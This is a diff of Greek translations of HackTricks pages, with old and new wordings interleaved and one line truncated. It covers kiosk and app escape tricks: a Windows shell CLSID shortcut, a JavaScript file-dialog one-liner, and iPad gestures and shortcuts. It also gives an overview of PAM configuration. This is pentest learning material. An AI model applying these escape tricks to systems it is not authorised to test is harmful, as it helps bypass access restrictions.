* `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
|
||||
|
||||
## Εμφάνιση Επεκτάσεων Αρχείων
|
||||
|
||||
Ελέγξτε αυτήν τη σελίδα για περισσότερες πληροφορίες: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
|
||||
|
||||
# Κόλπα περιηγητών
|
||||
# Κόλπα Περιηγητών
|
||||
|
||||
Αντίγραφο ασφαλείας των εκδόσεων iKat:
|
||||
Αντίγραφα ασφαλείας iKat εκδόσεων:
|
||||
|
||||
[http://swin.es/k/](http://swin.es/k/)\
|
||||
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
|
||||
|
||||
Δημιουργήστε ένα κοινό διάλογο χρησιμοποιώντας JavaScript και αποκτήστε πρόσβαση στον εξερευνητή αρχείων: `document.write('<input/type=file>')`
|
||||
Δημιουργήστε ένα κοινό διάλογο χρησιμοποιώντας JavaScript και έχετε πρόσβαση στον εξερευνητή αρχείων: `document.write('<input/type=file>')`
|
||||
Πηγή: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
|
||||
|
||||
# iPad
|
||||
|
||||
## Χειρονομίες και κουμπιά
|
||||
|
||||
* Σαρώστε προς τα πάνω με τέσσερα (ή πέντε) δάχτυλα / Διπλό πάτημα στο κουμπί Αρχικής σελίδας: Για να δείτε την προβολή πολλαπλών εργασιών και να αλλάξετε εφαρμογή.
|
||||
* Σύρετε προς τα επάνω με τέσσερα (ή πέντε) δάχτυλα / Διπλό πάτημα στο κουμπί Αρχικής: Για να δείτε την προβολή πολλαπλών εργασιών και να αλλάξετε Εφαρμογή
|
||||
* Σύρετε με έναν τρόπο ή άλλο με τέσσερα ή πέντε δάχτυλα: Προκειμένου να αλλάξετε στην επόμενη/τελευταία Εφαρμογή
|
||||
* Κλείστε την οθόνη με πέντε δάχτυλα / Αγγίξτε το κουμπί Αρχικής / Σύρετε προς τα επάνω με 1 δάχτυλο από το κάτω μέρος της οθόνης με γρήγορη κίνηση προς τα πάνω: Για πρόσβαση στην Αρχική
|
||||
* Σύρετε ένα δάχτυλο από το κάτω μέρος της οθόνης μόλις 1-2 ίντσες (αργά): Θα εμφανιστεί η βάση
|
||||
* Σύρετε προς τα κάτω από την κορυφή της οθόνης με 1 δάχτυλο: Για να δείτε τις ειδοποιήσεις σας
|
||||
* Σύρετε προς τα κάτω με 1 δάχτυλο στην πάνω δεξιά γωνία της οθόνης: Για να δείτε το κέντρο ελέγχου του iPad Pro
|
||||
* Σύρετε ένα δάχτυλο από τα αριστερά της οθόνης 1-2 ίντσες: Για να δείτε την προβολή Σήμερα
|
||||
* Σύρετε γρήγορα ένα δάχτυλο από το κέντρο της οθόνης προς τα δεξιά ή αριστερά: Για να αλλάξετε στην επόμενη/τελευταία Εφαρμογή
|
||||
* Πατήστε και κρατήστε πατημένο το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad + Μετακινήστε τον Ρυθμιστικό Ισχύος προς το "απενεργοποίηση" όλο το δρόμο προς τα δεξιά: Για να απενεργοποιήσετε
|
||||
* Πατήστε το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad και το κουμπί Αρχικής για λίγα δευτερόλεπτα: Για να επιβάλετε μια σκληρή απενεργοποίηση
|
||||
* Πατήστε το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad και το κουμπί Αρχικής γρήγορα: Για να τραβήξετε μια στιγμιότυπη εικόνα που θα εμφανιστεί στην κάτω αριστερή γωνία της οθόνης. Πατήστε και τα δύο κουμπιά ταυτόχρονα πολύ σύντομα όπως αν τα κρατάτε λίγα δευτερόλεπτα θα πραγματοποιηθεί μια σκληρή απενεργοποίηση
|
||||
|
||||
* Σαρώστε προς τη μία ή την άλλη κατεύθυνση με τέσσερα ή πέντε δάχτυλα: Προκειμένου να αλλάξετε στην επόμενη/προηγούμενη εφαρμογή.
|
||||
## Συντομεύσεις
|
||||
|
||||
* Κλείστε την οθόνη με πέντε δάχτυλα / Αγγίξτε το κουμπί Αρχικής σελίδας / Σαρώστε προς τα πάνω με ένα δάχτυλο από το κάτω μέρος της οθόνης με γρήγορη κίνηση προς τα πάνω: Για να αποκτήσετε πρόσβαση στην Αρχική σελίδα.
|
||||
Θα πρέπει να έχετε ένα πληκτρολόγιο iPad ή έναν προσαρμογέα πληκτρολογίου USB. Θα εμφανιστούν μόνο οι συντομεύσεις που μπορούν να βοηθήσουν στην απόδραση από την εφαρμογή εδώ.
|
||||
|
||||
* Σαρώστε με ένα δάχτυλο από το κάτω μέρος της οθόνης με αργή κίνηση 1-2 ίντσες: Θα εμφανιστεί η γραμμή εργαλείων.
|
||||
| Κλειδί | Όνομα |
|
||||
| --- | ------------ |
|
||||
| ⌘ | Εντολή |
|
||||
| ⌥ | Επιλογή (Alt) |
|
||||
| ⇧ | Μετατόπιση |
|
||||
| ↩ | Επιστροφή |
|
||||
| ⇥ | Tab |
|
||||
| ^ | Έλεγχος |
|
||||
| ← | Αριστερό Βέλος |
|
||||
| → | Δεξί Βέλος |
|
||||
| ↑ | Πάνω Βέλος |
|
||||
| ↓ | Κάτω Βέλος |
|
||||
|
||||
* Σαρώστε προς τα κάτω από την κορυφή της οθόνης με ένα δάχτυλο: Για να δείτε τις ειδοποιήσεις σας.
|
||||
### Συντομεύσεις Συστήματος
|
||||
|
||||
* Σαρώστε προς τα κάτω με ένα δάχτυλο στην πάνω δεξιά γωνία της οθόνης: Για να δείτε το κέντρο ελέγχου του iPad Pro.
|
||||
Αυτές οι συντομεύσεις είναι για τις οπτικές ρυθμίσεις και τις ρυθμίσεις ήχου, ανάλογα με τη χρήση του iPad.
|
||||
|
||||
* Σαρώστε ένα δάχτυλο α
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| -------- | ------------------------------------------------------------------------------ |
|
||||
| F1 | Σκοτεινή οθόνη |
|
||||
| F2 | Φωτεινή οθόνη |
|
||||
| F7 | Πίσω ένα τραγούδι |
|
||||
| F8 | Αναπαραγωγή/παύση |
|
||||
| F9 | Παράκαμψη τραγουδιού |
|
||||
| F10 | Σίγαση |
|
||||
| F11 | Μείωση έντασης |
|
||||
| F12 | Αύξηση έντασης |
|
||||
| ⌘ Space | Εμφάνιση λίστας διαθέσιμων γλωσσών. Για να επιλέξετε μία, πατήστε ξανά το πλήκτρο διαστήματος. |
|
||||
|
||||
### Πλοήγηση iPad
|
||||
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| -------------------------------------------------- | ------------------------------------------------------- |
|
||||
| ⌘H | Μετάβαση στην Αρχική |
|
||||
| ⌘⇧H (Command-Shift-H) | Μετάβαση στην Αρχική |
|
||||
| ⌘ (Space) | Άνοιγμα Spotlight |
|
||||
| ⌘⇥ (Command-Tab) | Λίστα των τελευταίων δέκα χρησιμοποιημένων εφαρμογών |
|
||||
| ⌘\~ | Μετάβαση στην τελευταία Εφαρμογή |
|
||||
| ⌘⇧3 (Command-Shift-3) | Στιγμιότυπο οθόνης (εμφανίζεται στην κάτω αριστερή γωνία για αποθήκευση
|
||||
### Συντομεύσεις Safari
|
||||
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| ----------------------- | ------------------------------------------------- |
|
||||
| ⌘L (Command-L) | Άνοιγμα τοποθεσίας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘W | Κλείσιμο τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση τρέχουσας καρτέλας |
|
||||
| ⌘. | Διακοπή φόρτωσης τρέχουσας καρτέλας |
|
||||
| ^⇥ | Μετάβαση στην επόμενη καρτέλα |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | Μετάβαση στην προηγούμενη καρτέλα |
|
||||
| ⌘L | Επιλογή του πεδίου κειμένου/URL για τροποποίηση |
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| ----------------------- | ------------------------------------------------ |
|
||||
| ⌘L (Command-L) | Άνοιγμα τοποθεσίας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘W | Κλείσιμο της τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση της τρέχουσας καρτέλας |
|
||||
| ⌘. | Διακοπή φόρτωσης της τρέχουσας καρτέλας |
|
||||
| ^⇥ | Μετάβαση στην επόμενη καρτέλα |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | Μετάβαση στην προηγούμενη καρτέλα |
|
||||
| ⌘L | Επιλογή του πεδίου κειμένου/URL για τροποποίηση |
|
||||
| ⌘⇧T (Command-Shift-T) | Άνοιγμα τελευταίας κλεισμένης καρτέλας (μπορεί να χρησιμοποιηθεί πολλές φορές) |
|
||||
| ⌘\[ | Πήγαινε πίσω μια σελίδα στο ιστορικό περιήγησής σας |
|
||||
| ⌘] | Πήγαινε μπροστά μια σελίδα στο ιστορικό περιήγησής σας |
|
||||
| ⌘⇧R | Ενεργοποίηση της λειτουργίας ανάγνωσης |
|
||||
| ⌘\[ | Πήγαινε πίσω σε μια σελίδα στο ιστορικό περιήγησής σας |
|
||||
| ⌘] | Πήγαινε μπροστά σε μια σελίδα στο ιστορικό περιήγησής σας |
|
||||
| ⌘⇧R | Ενεργοποίηση λειτουργίας Αναγνώστη |
|
||||
|
||||
### Συντομεύσεις Mail
|
||||
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| -------------------------- | ---------------------------- |
|
||||
| ⌘L | Άνοιγμα τοποθεσίας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘W | Κλείσιμο τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση τρέχουσας καρτέλας |
|
||||
| ⌘. | Διακοπή φόρτωσης τρέχουσας καρτέλας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘W | Κλείσιμο της τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση της τρέχουσας καρτέλας |
|
||||
| ⌘. | Διακοπή φόρτωσης της τρέχουσας καρτέλας |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | Αναζήτηση στο εισερχόμενο ταχυδρομείο σας |
|
||||
|
||||
# Αναφορές
|
||||
|
@ -160,16 +271,28 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Συμμετάσχετε** 💬 στην [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs** στα αποθετήρια [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο github.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,17 +12,30 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το **PAM (Pluggable Authentication Modules)** λειτουργεί ως ένας μηχανισμός ασφαλείας που **επαληθεύει την ταυτότητα των χρηστών που προσπαθούν να έχουν πρόσβαση σε υπηρεσίες υπολογιστή**, ελέγχοντας την πρόσβασή τους βάσει διάφορων κριτηρίων. Είναι παρόμοιο με έναν ψηφιακό πύλη, εξασφαλίζοντας ότι μόνο εξουσιοδοτημένοι χρήστες μπορούν να αλληλεπιδράσουν με συγκεκριμένες υπηρεσίες, ενώ πιθανώς περιορίζει τη χρήση τους για να αποτρέψει την υπερφόρτωση του συστήματος.
|
||||
Το **PAM (Pluggable Authentication Modules)** λειτουργεί ως μηχανισμός ασφαλείας που **επαληθεύει την ταυτότητα των χρηστών που προσπαθούν να έχουν πρόσβαση σε υπηρεσίες υπολογιστών**, ελέγχοντας την πρόσβασή τους με βάση διάφορα κριτήρια. Είναι παρόμοιο με έναν ψηφιακό πύλωνα, εξασφαλίζοντας ότι μόνο εξουσιοδοτημένοι χρήστες μπορούν να αλληλεπιδρούν με συγκεκριμένες υπηρεσίες, ενώ πιθανώς περιορίζει τη χρήση τους για να αποτρέψει υπερφορτώσεις συστήματος.
|
||||
|
||||
### Αρχεία Διαμόρφωσης
|
||||
|
||||
- **Τα συστήματα Solaris και UNIX-based** συνήθως χρησιμοποιούν ένα κεντρικό αρχείο διαμόρφωσης που βρίσκεται στο `/etc/pam.conf`.
|
||||
- **Τα συστήματα Linux** προτιμούν μια προσέγγιση με κατάλογο, αποθηκεύοντας τις ρυθμίσεις για κάθε υπηρεσία στον κατάλογο `/etc/pam.d`. Για παράδειγμα, το αρχείο διαμόρφωσης για την υπηρεσία σύνδεσης βρίσκεται στο `/etc/pam.d/login`.
|
||||
- **Τα συστήματα Solaris και UNIX** συνήθως χρησιμοποιούν ένα κεντρικό αρχείο διαμόρφωσης που βρίσκεται στο `/etc/pam.conf`.
|
||||
- **Τα συστήματα Linux** προτιμούν μια προσέγγιση κατάλογου, αποθηκεύοντας τις ρυθμίσεις για συγκεκριμένες υπηρεσίες μέσα στο `/etc/pam.d`. Για παράδειγμα, το αρχείο διαμόρφωσης για την υπηρεσία σύνδεσης βρίσκεται στο `/etc/pam.d/login`.
|
||||
|
||||
Ένα παράδειγμα μιας διαμόρφωσης PAM για την υπηρεσία σύνδεσης μπορεί να φαίνεται ως εξής:
|
||||
Ένα παράδειγμα μιας διαμόρφωσης PAM για την υπηρεσία σύνδεσης μπορεί να φαίνεται κάπως έτσι:
|
||||
```text
|
||||
auth required /lib/security/pam_securetty.so
|
||||
auth required /lib/security/pam_nologin.so
|
||||
|
@ -35,42 +48,55 @@ password required /lib/security/pam_ldap.so
|
|||
password required /lib/security/pam_pwdb.so use_first_pass
|
||||
session required /lib/security/pam_unix_session.so
|
||||
```
|
||||
### **Πραγματικοί Τομείς Διαχείρισης PAM**
|
||||
### **Πραγματικά Τομείς Διαχείρισης PAM**
|
||||
|
||||
Αυτοί οι τομείς, ή ομάδες διαχείρισης, περιλαμβάνουν τους **auth**, **account**, **password** και **session**, ο καθένας υπεύθυνος για διάφορες πτυχές της διαδικασίας πιστοποίησης και διαχείρισης συνεδρίας:
|
||||
Αυτοί οι τομείς, ή ομάδες διαχείρισης, περιλαμβάνουν τα **auth**, **account**, **password**, και **session**, κάθε ένας υπεύθυνος για διαφορετικές πτυχές της διαδικασίας πιστοποίησης και διαχείρισης συνεδρίας:
|
||||
|
||||
- **Auth**: Επαληθεύει την ταυτότητα του χρήστη, συχνά με την ζήτηση κωδικού πρόσβασης.
|
||||
- **Account**: Χειρίζεται τον έλεγχο του λογαριασμού, ελέγχοντας συνθήκες όπως η ομαδική συμμετοχή ή περιορισμούς ως προς την ώρα της ημέρας.
|
||||
- **Password**: Διαχειρίζεται την ενημέρωση του κωδικού πρόσβασης, συμπεριλαμβανομένων ελέγχων πολυπλοκότητας ή πρόληψης επιθέσεων με λεξικό.
|
||||
- **Session**: Διαχειρίζεται τις ενέργειες κατά την έναρξη ή το τέλος μιας συνεδρίας υπηρεσίας, όπως η προσάρτηση καταλόγων ή ορισμός ορίων πόρων.
|
||||
- **Auth**: Επικυρώνει την ταυτότητα του χρήστη, συχνά μέσω προτροπής για κωδικό πρόσβασης.
|
||||
- **Account**: Χειρίζεται τον έλεγχο του λογαριασμού, ελέγχοντας συνθήκες όπως η ομάδα στην οποία ανήκει ή περιορισμούς ώρας της ημέρας.
|
||||
- **Password**: Διαχειρίζεται τις ενημερώσεις κωδικού πρόσβασης, συμπεριλαμβανομένων ελέγχων πολυπλοκότητας ή πρόληψης επιθέσεων λεξικού.
|
||||
- **Session**: Διαχειρίζεται ενέργειες κατά την έναρξη ή το τέλος μιας υπηρεσίας συνεδρίας, όπως η προσάρτηση καταλόγων ή η οριοθέτηση πόρων.
|
||||
|
||||
### **Έλεγχοι Ενοτήτων PAM**
|
||||
### **Ελέγχοι Ενοτήτων PAM**
|
||||
|
||||
Οι έλεγχοι καθορίζουν την αντίδραση της ενότητας σε επιτυχία ή αποτυχία, επηρεάζοντας τη συνολική διαδικασία πιστοποίησης. Αυτοί περιλαμβάνουν:
|
||||
Οι ελέγχοι καθορίζουν την αντίδραση της ενότητας σε επιτυχία ή αποτυχία, επηρεάζοντας τη συνολική διαδικασία πιστοποίησης. Αυτοί περιλαμβάνουν:
|
||||
|
||||
- **Required**: Η αποτυχία μιας απαιτούμενης ενότητας οδηγεί σε τελική αποτυχία, αλλά μόνο μετά τον έλεγχο όλων των επόμενων ενοτήτων.
|
||||
- **Requisite**: Άμεση τερματισμός της διαδικασίας μετά από αποτυχία.
|
||||
- **Sufficient**: Η επιτυχία παρακάμπτει τους υπόλοιπους ελέγχους του ίδιου τομέα, εκτός εάν αποτύχει μια επόμενη ενότητα.
|
||||
- **Optional**: Προκαλεί αποτυχία μόνο εάν είναι η μοναδική ενότητα στη στοίβα.
|
||||
- **Sufficient**: Η επιτυχία παρακάμπτει τους υπόλοιπους ελέγχους του ίδιου τομέα εκτός αν αποτύχει μια επόμενη ενότητα.
|
||||
- **Optional**: Προκαλεί αποτυχία μόνο αν είναι η μοναδική ενότητα στη στοίβα.
|
||||
|
||||
### Παράδειγμα Σεναρίου
|
||||
|
||||
Σε μια ρύθμιση με πολλές ενότητες πιστοποίησης, η διαδικασία ακολουθεί μια αυστηρή σειρά. Εάν η ενότητα `pam_securetty` βρει το τερματικό σύνδεσης μη εξουσιοδοτημένο, οι συνδέσεις ως root αποκλείονται, αλλά όλες οι ενότητες εξακολουθούν να επεξεργάζονται λόγω της "απαιτούμενης" κατάστασής της. Η ενότητα `pam_env` ορίζει μεταβλητές περιβάλλοντος, που μπορεί να βοηθήσουν στην εμπειρία του χρήστη. Οι ενότητες `pam_ldap` και `pam_unix` συνεργάζονται για την πιστοποίηση του χρήστη, με την `pam_unix` να προσπαθεί να χρησιμοποιήσει έναν προηγουμένως παρεχόμενο κωδικό πρόσβασης, βελτιώνοντας την αποδοτικότητα και ευελιξία των μεθόδων πιστοποίησης.
|
||||
Σε μια ρύθμιση με πολλαπλές ενότητες auth, η διαδικασία ακολουθεί ένα αυστηρό σειρά. Αν η ενότητα `pam_securetty` εντοπίσει το τερματικό σύνδεσης μη εξουσιοδοτημένο, οι συνδέσεις root αποκλείονται, αλλά όλες οι ενότητες εξακολουθούν να επεξεργάζονται λόγω της κατάστασής της "απαιτείται". Η `pam_env` ορίζει μεταβλητές περιβάλλοντος, που ενδεχομένως βοηθούν στην εμπειρία του χρήστη. Οι ενότητες `pam_ldap` και `pam_unix` συνεργάζονται για την πιστοποίηση του χρήστη, με την `pam_unix` να προσπαθεί να χρησιμοποιήσει έναν προηγουμένως παραδοθέντα κωδικό πρόσβασης, βελτιώνοντας την αποτελεσματικότητα και ευελιξία στις μεθόδους πιστοποίησης.
|
||||
|
||||
## Αναφορές
|
||||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Συμμετάσχετε** 💬 στην [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας στο hacking υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,40 +2,54 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
